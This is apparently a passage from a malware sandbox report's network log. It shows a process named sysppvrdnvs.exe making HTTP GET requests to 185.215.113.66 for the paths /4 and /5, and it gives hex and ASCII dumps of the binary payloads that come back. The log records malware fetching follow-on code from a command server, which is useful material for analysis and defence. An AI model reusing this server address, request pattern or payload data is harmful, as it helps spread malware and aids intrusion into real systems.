                                                                                                                                                                                                    Content-Length: 16128
                                                                                                                                                                                                    Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "66f3a973-3f00"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: aa ff 5b 85 19 de 79 93 4d ba ae a5 78 a9 fd 33 2b 5f 5b 98 2f e2 90 9b 43 bd 1a 0d 04 b2 f0 0d e0 d2 4c b9 c7 49 cc d7 d9 86 fc 8a cb a9 8a a3 e8 4b 30 70 cc 50 61 19 a3 47 82 6a 87 71 cd 8c 0c 72 ae da 3e dd b2 2b 22 4d d7 28 a6 af 1c bc 29 de 1c 02 e5 f1 a6 6e 66 9e dd 18 a8 da 2b ff 6d c4 8d ee fd 38 60 ba e4 86 f4 d7 40 df 27 56 a7 f2 ca 5d 5f fa 84 aa 7b cf 31 80 26 84 f3 f2 df d5 e9 24 ed 82 c6 22 c1 fd cf 14 bb 4c 2b d9 27 6c f4 35 00 10 82 a6 1e bb 1d cf 5d 31 5a dd 21 48 df 7c c6 bd aa 01 4a af 21 b4 2f b4 3d 3a 6a 72 7e ad 32 ca d0 54 ff fa 5e 52 a6 ae 21 74 90 74 88 9f 33 25 5f 1c 2f 3a cd 70 f4 a3 40 f4 de 5a 2d 2e a5 ab 8c c7 c4 39 ee ac 1f df dd ad 83 61 53 40 96 ef 54 f8 d5 99 78 d0 5c 15 a6 e4 3a 94 aa 88 b5 29 9f 27 fe df f6 f1 44 8d bc dd e1 03 41 86 b3 e3 55 74 f6 93 e0 52 2d 67 f4 5a 3e ac f1 42 1d 05 88 0b c7 71 98 35 3a 39 b0 14 2a a2 79 0b 6e 7a ab 34 d0 5e f3 c0 be 79 a1 6e 92 b2 77 e0 36 5f b2 e6 fd 89 91 4d 37 1c 32 b3 ee 70 af 6a 4a 74 8a 23 65 0e 7a c7 53 57 d8 80 68 b7 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: [yMx3+_[/CLIK0pPaGjqr>+"M()nf+m8`@'V]_{1&$"L+'l5]1Z!H|J!/=:jr~2T^R!tt3%_/:p@Z-.9aS@Tx\:)'DAUtR-gZ>Bq5:9*ynz4^ynw6_M72pjJt#ezSWh4{q/br( olSu5nw;i#:X<<T>cRfzgzDG:]]G=su`#Zt9Xw48~$YJ<0}~,4SJGJwzbyt;9C#<$v@0`/"8bn,]E-VpYcGa:q2oWO,N3#@my1~-I-.!m<fa^ak=FzeMq/(\R\)KwxlM7LD G+m\E~Xt:|2EX<\P3,qDxRG,~TaZ~v{zJ[a$y#gR<v\>cjn)?kSxP07@Pe@ZL6RvoexXOK4For'A8K%?RtGVB}c7!8=f&d
                                                                                                                                                                                                    Oct 26, 2024 07:27:41.790513039 CEST1236INData Raw: 49 24 02 da 57 17 86 62 ea 4f b3 98 a8 06 64 68 e4 0e 11 0e 16 b4 f3 7d b0 7f 4e f3 b6 bb c5 b4 04 d0 bf 65 7f 95 6e fe ce e4 7b b2 ca f9 ec 06 09 b6 58 0e 05 a0 aa 0b 83 ec 25 fb e4 1d e9 c0 9d 1e 4d 8c be fd 63 31 5e 38 76 9c 34 c9 48 ba b1 12
                                                                                                                                                                                                    Data Ascii: I$WbOdh}Nen{X%Mc1^8v4H|f|'x\R')Z{iC,}'hCh5[wRG@XB;G[-iC+(?E=y[$He
                                                                                                                                                                                                    Oct 26, 2024 07:27:41.790600061 CEST224INData Raw: 79 66 85 08 93 95 1d 74 ce 4a 11 6d 82 e1 0a e2 81 2a fe 53 85 e7 03 3d 26 89 2a ac bc 6b 82 a8 ad b3 ff 6f 2b 13 be 1a 78 df 38 94 08 4e 19 a1 85 a6 e7 97 55 2a 34 6a c4 05 a0 b4 7d d6 cf ac 4f ad fd 67 d8 7a 3f 8d 05 43 ee 09 c1 87 a8 e4 28 65
                                                                                                                                                                                                    Data Ascii: yftJm*S=&*ko+x8NU*4j}Ogz?C(ekds&;`!R[8ipurbyc'Xg*y88(BAoqb\3mc2kg&;Rao#``2C(BRc
                                                                                                                                                                                                    Oct 26, 2024 07:27:41.790611029 CEST1236INData Raw: 41 ec ab 0e d7 45 cf ab 0e 79 33 fa ea f9 2e 28 64 7b 41 ff 1a 23 f4 d9 9c b8 a5 9d 2f 0d c6 fe ab 0e c9 ee d9 13 ce dc 68 f4 9b 1f 3e 90 1c 28 88 80 48 b0 b1 cb 79 b1 4e 7d bc 58 18 85 f5 32 6d 8b 2b 17 40 18 30 27 2b 67 00 d0 b2 cc 55 f3 32 f8
                                                                                                                                                                                                    Data Ascii: AEy3.(d{A#/h>(HyN}X2m+@0'+gU2OduQa17j(rEw3<&tLi)DVo|0<~CjZ1HVs1+q:_MvbHSw~h"DEH+{+_7r^a0
                                                                                                                                                                                                    Oct 26, 2024 07:27:41.790622950 CEST1236INData Raw: 78 4a 4a e4 65 af 22 d2 92 e2 df 78 7f d1 e6 ca a4 02 d3 67 ac d9 2b c6 62 19 fb b8 2d 1e 26 b6 ff 96 d5 10 78 5b 8b d4 b1 6d 2c 56 08 8a d0 83 62 2f ba 57 55 c1 86 86 cd b3 ec 1e 45 65 1e 85 dc c0 74 8c 14 53 db 7e 46 bb 02 d5 2f 9c 78 d5 68 99
                                                                                                                                                                                                    Data Ascii: xJJe"xg+b-&x[m,Vb/WUEetS~F/xhfo&Y.=yU9hwaL{%+_A1CvsDJrf?Z-\]?if;&(AHg+^M$^GGWRmMZuir&Zrqa
                                                                                                                                                                                                    Oct 26, 2024 07:27:41.790633917 CEST1236INData Raw: 01 f2 50 74 c6 b0 56 a0 81 c4 c6 4f 44 2f db 6d 83 da 85 c4 de da dc 70 ac 44 0c 14 56 51 09 2a 6a 6a 26 21 f9 e9 2d 36 4d bb a3 f8 61 3a 02 7c 47 15 a3 02 f8 40 ac 96 a3 9a 60 e3 52 0c 0c a1 f7 11 77 3c d4 07 af 9f fe 2c bf 79 d7 fb ba 77 a7 d6
                                                                                                                                                                                                    Data Ascii: PtVOD/mpDVQ*jj&!-6Ma:|G@`Rw<,ywV#eeEVBAH/^Cpo#=S-s_b=Z@b(A>O>2#i%wt<2gQE>&HM,T>E0`D/ZSd|g=K/rz&/D)
                                                                                                                                                                                                    Oct 26, 2024 07:27:41.790643930 CEST1236INData Raw: f8 51 be 4b b6 43 6d 01 15 a3 4a db 9c 72 31 94 46 68 57 fb c2 a8 b1 8c 29 1b 55 ed 90 ce a7 60 a9 e8 a0 d9 fe 61 0c ea e8 51 ff 66 4e 99 92 b1 33 1d 88 13 f2 f4 df 44 68 34 4f 2c e9 d5 ad 09 9e 32 9b 57 aa 4d 74 51 7c ee fa 18 fd 05 6b c9 7f 42
                                                                                                                                                                                                    Data Ascii: QKCmJr1FhW)U`aQfN3Dh4O,2WMtQ|kBE=L~] ;jZG#Ad^7p7:Elc9Bc`Lae`%iOGVY>g-s1/>v!hA_5cdKp> H,25kCl#p
                                                                                                                                                                                                    Oct 26, 2024 07:27:41.790656090 CEST1236INData Raw: 08 c6 56 37 3e 07 53 8d 3f bf e6 9e 35 f6 81 e6 c8 58 4b 3d 60 bb 15 3a c3 1b 62 a0 8a 8b ea bd e1 74 d9 b6 e1 ae 80 48 f7 68 a6 6f a5 c7 2f de cb 49 8f a2 fd bc bb 1f 2d f8 36 a0 98 4a 91 dc 4d d8 35 aa e1 0a ed 0d aa 5b 63 7d 30 27 7a c4 ac a7
                                                                                                                                                                                                    Data Ascii: V7>S?5XK=`:btHho/I-6JM5[c}0'z 8g'?Q<Py*P-DH_gb9LKbS_x_9sU@a]&Y}{2U=)IuG!$<hBu;/V|XA[K+OQM
                                                                                                                                                                                                    Oct 26, 2024 07:27:41.790668011 CEST1236INData Raw: 9f 98 ef e2 e0 19 73 88 13 ef c7 43 5a 77 90 5c ff 5d 39 48 93 47 fc a5 b0 35 0d 2f 43 52 57 d9 68 ad 52 83 bd d5 fe 35 8f 09 95 29 2a a9 e5 22 7e 23 b8 7e 83 38 85 84 7a 26 12 6c 6b ea a2 4c e7 7b 47 e3 f0 e8 56 1d cc f2 08 00 0d 31 ec 92 eb 2b
                                                                                                                                                                                                    Data Ascii: sCZw\]9HG5/CRWhR5)*"~#~8z&lkL{GV1+!Y&IAFt+B\?o?ZMXksfB"+0ZlOx=k>hH'E2~wjJcJ#w5aITO'?>{n}-=71P9a=XZ~Xg~2-yQ2
                                                                                                                                                                                                    Oct 26, 2024 07:27:41.790679932 CEST1236INData Raw: de ed d8 77 47 ae da ce 9d 29 d2 c2 3a f6 dc 8c 98 ae aa 4f 5d 61 7a 7e fa 62 ec 6b 12 a5 8d 9d 37 87 9c 63 f0 48 9c 45 26 da 18 a6 68 1a c1 be 9c a7 c8 5f 02 a1 b7 e4 df d8 30 6e 8d b2 ea cd cb a3 47 99 79 89 5f 31 5b b7 1f ac 6f 14 75 35 de e8
                                                                                                                                                                                                    Data Ascii: wG):O]az~bk7cHE&h_0nGy_1[ou5l:iZ2~q:NGp&*Euhl"y3YCQ'y1T3OPl8q@fyKC@Smy5Ov*O9_JBPW31H$iR7L)hm\{mWn]$
                                                                                                                                                                                                    Oct 26, 2024 07:27:41.796339989 CEST1236INData Raw: e3 73 c8 81 0b aa 3d 23 b1 16 15 9d 00 a4 8a 4f 14 93 87 83 58 40 88 e3 97 7a e5 18 34 75 72 00 81 d9 f1 90 69 f8 c7 81 4d e4 e6 ea 45 c9 37 74 37 dc 8e c5 8e 36 9f 9b db 9d c4 c4 d2 e3 8d c4 d2 00 a6 65 31 94 74 94 88 26 76 51 4d a0 7d 3a 9f 2a
                                                                                                                                                                                                    Data Ascii: s=#OX@z4uriME7t76e1t&vQM}:*)}Ui=`)o?+?s:HwC~zM@JVtT+H94^+'iq?Gi[rN\xCHosq,$X*V(4


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    14192.168.2.854356185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:27:43.833300114 CEST166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:27:44.737297058 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:44 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 10496
                                                                                                                                                                                                    Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "67154d18-2900"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                                                                                                    Oct 26, 2024 07:27:44.737319946 CEST212INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                                                                                                    Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>*B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8
                                                                                                                                                                                                    Oct 26, 2024 07:27:44.737463951 CEST1236INData Raw: 98 1b 6d dd fc ba 1d a3 3b 61 6a 0d 57 2c cc 4e e9 93 b3 98 99 37 7f 26 84 18 f6 89 b3 51 4b 68 2e aa eb 28 5b 67 c2 09 58 43 b9 1d 1d 19 7e af c3 53 17 6c 0b ba b5 b6 6d f0 37 9e 17 bc da b3 c1 05 6c f2 93 67 30 bd 68 64 0b ea eb 37 92 a2 00 4e
                                                                                                                                                                                                    Data Ascii: m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7|VbF9?gk{is6u_pi!F`L4<c_^F992M\v)=Ov+uQP>"B SE<h
                                                                                                                                                                                                    Oct 26, 2024 07:27:44.737482071 CEST1236INData Raw: 70 10 06 e4 81 90 d1 c1 c5 b4 bd 75 75 92 9f e1 f9 e6 29 3b 58 62 3c 3e ee 4d 5c ff 89 ad 07 e1 c5 53 10 04 a3 9b 91 41 50 dd 80 d7 b0 77 c1 85 ae 83 44 81 dd c0 04 63 a3 11 90 99 5b ae f0 f8 38 dd 71 2d 21 80 71 5d bd 04 ba d3 63 92 a2 37 99 76
                                                                                                                                                                                                    Data Ascii: puu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E98k-70~?]$==T+TM^e~'O(wGX\1Y&$
                                                                                                                                                                                                    Oct 26, 2024 07:27:44.737493992 CEST1236INData Raw: 87 56 8d 55 7a 06 1d 06 63 a0 69 65 f9 88 5f a6 24 ef 65 f7 e3 05 82 c5 fb 4d 84 3b 04 0e 42 92 eb 9b 6e 69 2c 39 59 3b 8f 70 7a 08 ac ae 40 45 98 6c 63 bf 2e 99 7d 94 9a 8b f1 c3 cc 4a 57 06 c2 3e e9 9a 34 3d 9c 5c 75 16 3d de bc 1d 46 0f 84 f9
                                                                                                                                                                                                    Data Ascii: VUzcie_$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh['3(@`{nl;UfB5!59uGJ0hR!u(*d:Serk)Bd
                                                                                                                                                                                                    Oct 26, 2024 07:27:44.737509012 CEST436INData Raw: 6a 72 82 cc c2 f4 94 48 26 35 d9 0b 33 db 32 61 b3 d8 a6 03 60 93 23 26 f3 db ee b2 b6 8d 41 e9 57 78 64 89 3c 2c b2 17 d6 f6 a4 7f d9 76 5c 5d be de 02 8b 48 96 18 68 71 22 90 de 9d 34 6b 57 c9 fe 86 27 d7 fa 7b 1e 77 52 17 a8 34 f6 42 c9 a0 41
                                                                                                                                                                                                    Data Ascii: jrH&532a`#&AWxd<,v\]Hhq"4kW'{wR4BA=g-S*M^~lv^b%\Z)zW0EZSM#x6Y=z)}s]KL\Bd@!qcBXfk=*}nfKWLFy6qijjq6b
                                                                                                                                                                                                    Oct 26, 2024 07:27:44.737565994 CEST1236INData Raw: 16 56 06 fd 72 8c f1 eb dc 61 3b ae 41 79 4e 1e da e6 d0 e1 3c 2e b6 d0 80 4f a4 7e 60 3d ba 9e 03 c6 1a df 5d b2 2f fc 0f d5 c8 31 ec b4 4a 45 b2 d4 73 b8 57 1e d4 60 e0 be ee d4 00 54 af 98 8d ad 60 bf aa 44 96 1e 40 a4 db 93 88 a2 a6 1d 29 3b
                                                                                                                                                                                                    Data Ascii: Vra;AyN<.O~`=]/1JEsW`T`D@);q5'Q,>ac3h?\ma+lx]G!)2oS:5e_oG8h8UBCE'DVT>>`&>mjD}93[RR1Hhr[t|}
                                                                                                                                                                                                    Oct 26, 2024 07:27:44.737576962 CEST1236INData Raw: a5 b3 a3 8e 59 56 d1 23 1f 09 19 56 72 38 9b 0a 43 a7 37 de 43 6c 55 38 2e 2a 20 8e 0e 09 cd b6 08 2f b5 3b 37 dc 28 bb df 5e eb 88 be 15 b4 5a 53 48 ba 3e 33 d6 f3 62 9e e0 19 5c 0f 68 6c 6a 7f 47 c7 6b 63 e5 d3 9b eb 79 15 a0 d6 c4 60 4c f7 0f
                                                                                                                                                                                                    Data Ascii: YV#Vr8C7ClU8.* /;7(^ZSH>3b\hljGkcy`L@&C7W{lxe;c|<>i+,R:ecIfgIDpU^16gr2g"{Sq#<m0r2.Q'mUJ1lt{-
                                                                                                                                                                                                    Oct 26, 2024 07:27:44.737586975 CEST424INData Raw: 7e 51 f6 94 14 b6 19 09 ee 3b 59 30 f7 6f 71 62 a9 7f 81 06 da ca f3 13 9d 08 c3 db 3d 8f 67 08 aa a4 cf 1e b1 d0 cd dc 50 14 2f 04 2d fd 11 53 e2 ae a4 dc c9 10 d5 65 63 95 11 9a 93 94 ab 63 b4 0e 5a fd eb e5 bf ce 3f c0 6d 0d 5f 0a 8d f8 3d 55
                                                                                                                                                                                                    Data Ascii: ~Q;Y0oqb=gP/-SeccZ?m_=UVTM'aYv_w&%k"- 1?3ul2'Kus2)^XCO"N"^E]zgh[!nlIonB1jg
                                                                                                                                                                                                    Oct 26, 2024 07:27:44.737631083 CEST1236INData Raw: 37 84 b6 47 c4 b6 d2 65 71 14 ab 0a 9a d7 de 20 0a fe 16 4e 57 15 9d 28 c2 45 a4 85 4b 94 8d 8a 30 c9 f3 73 f1 89 9e 9a 1b 20 e3 28 75 d8 7f 5c 92 15 82 fd 18 f2 99 9e c5 01 c6 45 52 48 cf 34 41 98 ab 7c 30 4a 90 51 53 a0 e3 e4 ff 89 3d 13 1a cb
                                                                                                                                                                                                    Data Ascii: 7Geq NW(EK0s (u\ERH4A|0JQS=QtAcJ*,%Y]*Iw31Zz27?RQ7u|:mdQ(AQ*y@7p[8aferX.By){3I>mgYh'>
                                                                                                                                                                                                    Oct 26, 2024 07:27:44.742743015 CEST1037INData Raw: 4d c6 62 34 2e f8 86 f6 82 b7 5d 17 2a f5 83 7f 8b bd c4 61 25 12 a6 0b d3 25 13 b8 3d 1f f5 5c ac f6 f8 af 06 5d 1d 61 f4 eb 8e 8f a8 d9 d2 ee e6 43 3a 55 7b 7a 61 d0 ca a3 53 f4 c7 79 d4 7f 8d fc aa ce 29 b9 29 9c cb 3d 6e ce e6 6f f4 d1 81 f7
                                                                                                                                                                                                    Data Ascii: Mb4.]*a%%=\]aC:U{zaSy))=noXQ:hSRCoDcW"hK`O$|qKJb]=o@Y$;k>."U"R8-<]=^0^T*=}\M~\L,3H;{Rg,&?~O'd


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    15192.168.2.854376185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:27:46.763983965 CEST166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:27:47.675442934 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:47 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 13568
                                                                                                                                                                                                    Last-Modified: Tue, 22 Oct 2024 12:10:16 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "67179628-3500"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 0c 11 18 17 3d 7f 82 02 a6 24 36 4b 11 62 4d 55 d2 81 18 a8 7b ac b4 99 13 ea 95 14 cc 97 97 e2 0a 71 67 8a f6 90 c5 ca 7a 7b 56 bb fa e8 89 09 55 1a 05 57 8f 9c 1a 81 d8 bb 44 82 88 57 06 b0 a8 b1 0d 7d 50 5d 73 d2 54 4b d9 0b b0 cd a7 15 33 5a 57 25 7a d1 92 b0 cc 68 22 98 ff fd 1b 98 b0 f5 65 52 62 23 6d 48 84 63 2c a5 ce 1c d7 7e 20 81 7c 51 12 ee 07 70 82 1e bb bd 5b c1 57 cc 9f 3b 07 de 21 89 69 22 52 a2 b3 ac 41 42 e4 9f 74 46 e4 c5 ff 6a 73 b7 e0 c8 5f 4b 1f cc 28 e3 35 c9 6a 94 90 c9 95 c3 85 52 2c ae 57 13 b6 c7 b3 65 41 44 cb 6e cf 7e 5a 38 88 3a 70 d6 16 06 5e 35 43 a9 4c 56 d1 91 19 cf 12 60 0e f4 0e 93 ce ed f1 59 ab 0f ac b8 08 db 75 8f 57 bd 3e 74 90 a5 b5 79 a1 e7 5c 27 4a 05 b2 04 bb fc f0 de 98 12 16 00 a4 94 30 c4 34 a7 3f 3d d1 48 9d 54 69 63 38 91 b3 31 0e e5 1c 1b 3b 56 e3 53 a0 7c af cd 1f e8 b5 94 ca 54 f5 68 9c e2 81 d7 79 54 fc 2b 6d ba e7 01 91 17 71 86 42 4c 6b dd ff 4f a6 b4 df 21 b1 1d aa 7b 15 e2 4c ad c1 62 52 91 b1 1e ba e8 86 3c 96 57 ad 50 ef 4f 07 df 8e c3 28 72 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: =$6KbMU{qgz{VUWDW}P]sTK3ZW%zh"eRb#mHc,~ |Qp[W;!i"RABtFjs_K(5jR,WeADn~Z8:p^5CLV`YuW>ty\'J04?=HTic81;VS|ThyT+mqBLkO!{LbR<WPO(rVc=Tb''+DZE"rJ:h}nw1~z:/;fwH`^D|%F8MD)A_uhi\:h%~!a>&cbV)g$V]Bg1v@%<+({Ps?'f#[V>%}sKu~gWA09-#98wSKfvZgi<)X>rRj9[t6'G*\3+veYh_9^H-'BIh=M8Nz-nt>+yJMpWPLkPyW"y~&ecMz6sC!J`mS?2"OR]N xcxkit9f#:a#C"Ql0p{{rtE:r:'lL]!poXAdOq'Fa|yM{x;!++H.}bpp8h;qLLa<x<j
                                                                                                                                                                                                    Oct 26, 2024 07:27:47.675461054 CEST1236INData Raw: c5 f6 81 b2 5c be 3a f2 f4 a0 69 51 cb 1e 7a 65 63 1b 5e ad 0c 1e cb bc 15 0c c8 3c fd 96 62 f2 d2 3b 0a d0 1e 9d 66 0c cb 26 ef d1 f3 6e 2b c7 40 85 15 6d 0d 88 4b f9 89 10 2c 37 76 33 d6 5d a0 0a 79 c4 65 0a bc ad 27 98 0e b2 33 fc 54 5c f2 dd
                                                                                                                                                                                                    Data Ascii: \:iQzec^<b;f&n+@mK,7v3]ye'3T\*Sk}):rN]WO]1G>&!>dK*@i[]LzA)0N$w|n=29-BB){&ZI2ej` t
                                                                                                                                                                                                    Oct 26, 2024 07:27:47.675472975 CEST224INData Raw: f7 13 67 9e cd 6e f9 15 fc 3a cd df 70 8b 42 7b de a4 ca 85 57 6a 71 26 75 81 f0 54 29 ef 09 6e c9 67 f3 87 95 29 ab 8b 20 15 88 7f 2e 3e 35 68 a8 79 d1 4a b4 83 de db 9a ba b6 0b d8 d5 6f f0 69 be 83 27 84 f0 7c a3 ae 2f 39 57 5b 8d 33 ac 48 b0
                                                                                                                                                                                                    Data Ascii: gn:pB{Wjq&uT)ng) .>5hyJoi'|/9W[3H8 lyac&_ n3SABCwJv1s>psfyFOCHi_R7GL.@])H1Kr:s
                                                                                                                                                                                                    Oct 26, 2024 07:27:47.675586939 CEST1236INData Raw: ac 27 8b 18 ae bb 5d 87 aa b3 db 40 94 0e 2d 3a 4e fb 12 dd 3d f2 dd d2 dd a3 72 80 4d 76 81 af 56 a9 06 82 ae ff 8a 79 49 37 1c a2 b7 3a 25 ed f2 08 ab 4d 8e dd 95 b1 5a 7d 61 fb d3 0b d2 02 20 1c 85 9c e0 7f 4f c5 61 59 a6 ae e5 06 da f9 cf f8
                                                                                                                                                                                                    Data Ascii: ']@-:N=rMvVyI7:%MZ}a OaYrPQ;|<5c0aFh){B9hT-|`56el/9uLltfDO|CVi-|R)rhc
                                                                                                                                                                                                    Oct 26, 2024 07:27:47.675606012 CEST1236INData Raw: 9f 7a be d0 c0 38 dc 6c 17 43 1e 74 6c 00 69 b0 8d 22 0a 73 79 98 ca 5f 43 59 c7 44 73 8d 02 a0 d3 49 7e 61 8a bd dc b0 82 db 37 0b 45 a1 57 3c 51 92 f5 a2 fc aa c2 9b 3a 89 7a e3 e8 0c cd c5 9c 06 84 c4 a4 02 d8 fa 5c f3 c2 d1 d8 b2 fa af ce 82
                                                                                                                                                                                                    Data Ascii: z8lCtli"sy_CYDsI~a7EW<Q:z\,2`+tpk@T-#_DswpTn[/Ar"6k=G]5-[<FMBL]T"vV@#>:LkEIBIqI("'%Of1]<
                                                                                                                                                                                                    Oct 26, 2024 07:27:47.675617933 CEST1236INData Raw: 53 ec 08 6d 77 87 ce ab f8 b4 8d 12 03 c2 d0 fc 32 58 ac ae c2 7d a6 ff 67 7c d6 bd 35 b0 14 41 eb 84 7f cc e3 42 77 6f 3d 2f e4 e7 77 5d a6 ee 11 a8 b8 42 97 f2 5a d3 93 6e e3 01 36 1e 1b d9 3d 8e 5a 07 fc 0e eb 90 bc 84 d2 06 dc f1 21 e6 6f d5
                                                                                                                                                                                                    Data Ascii: Smw2X}g|5ABwo=/w]BZn6=Z!o{TVSz7[G8ZRb"wJ?is&w3M?8LBTa5Mr(*BDh)(l?ISrmXlv YF{R`[Rxi`Zi#?vm
                                                                                                                                                                                                    Oct 26, 2024 07:27:47.675628901 CEST1236INData Raw: 20 fe 60 84 92 86 f0 43 84 e9 1f 40 a6 c6 48 af 75 0d 9d d8 91 14 fd 8a 57 1f 6e 2b 0d 7f a1 36 f4 25 0c 63 28 e6 26 ea c0 85 72 53 d2 9b dd 56 05 bb 29 f0 f9 1b 91 d5 b0 dc 7b 3b f8 7b e3 cc eb 46 35 7f eb 9a 58 d2 9b 53 f3 7a 58 ac 9d 9f a6 03
                                                                                                                                                                                                    Data Ascii: `C@HuWn+6%c(&rSV){;{F5XSzX~PWo&N#Gx*n)'.d*syf~F9dO,zSj)8'e#OQC<(D36z/_@4P[<0>"8G&\IBidcWY'gI
                                                                                                                                                                                                    Oct 26, 2024 07:27:47.675642014 CEST1236INData Raw: 47 9b 4b 44 3e 28 81 d0 76 9b 68 a6 92 4d 40 ea 58 ed 58 d0 a5 55 22 fb 73 a3 94 bb a6 45 c7 1d 8f 22 9c ad 52 9c fb 2e b0 59 f8 c5 b5 53 d5 d4 3f e6 d4 9f c6 9c 17 4b 9c 04 d9 e0 d3 97 0a 73 5a a3 01 58 e0 63 ae b0 27 db 59 18 ae 9e 6a 86 64 ca
                                                                                                                                                                                                    Data Ascii: GKD>(vhM@XXU"sE"R.YS?KsZXc'Yjd\ZRf|K>YfaZ7^7BXhH`PmhT&:qy{NLSL0}9g|(]T YP=\E>`:#(&Ynz&TS@DSKr'^
                                                                                                                                                                                                    Oct 26, 2024 07:27:47.675654888 CEST1236INData Raw: a9 ef d9 c6 f9 6c 26 1a 6d 31 ae 60 70 0e cc 11 fe ea d2 72 3f 3b de 3b 59 d0 c3 89 3a d5 ce 60 51 b8 05 d7 7b 95 73 7a 79 e1 28 d2 1f 86 17 9b c1 1d 9e 3e d2 05 45 9a ed a1 cf ac 3c 20 22 83 6b 09 eb a3 92 fa 5e 60 02 d4 e6 e1 56 0c d0 29 e7 66
                                                                                                                                                                                                    Data Ascii: l&m1`pr?;;Y:`Q{szy(>E< "k^`V)f|),X@lI!\=IL86isF>["S$=Mm L tw=ss|%Q{G`p2rY61!w*NH\:&<vcc/5+1V j3M-
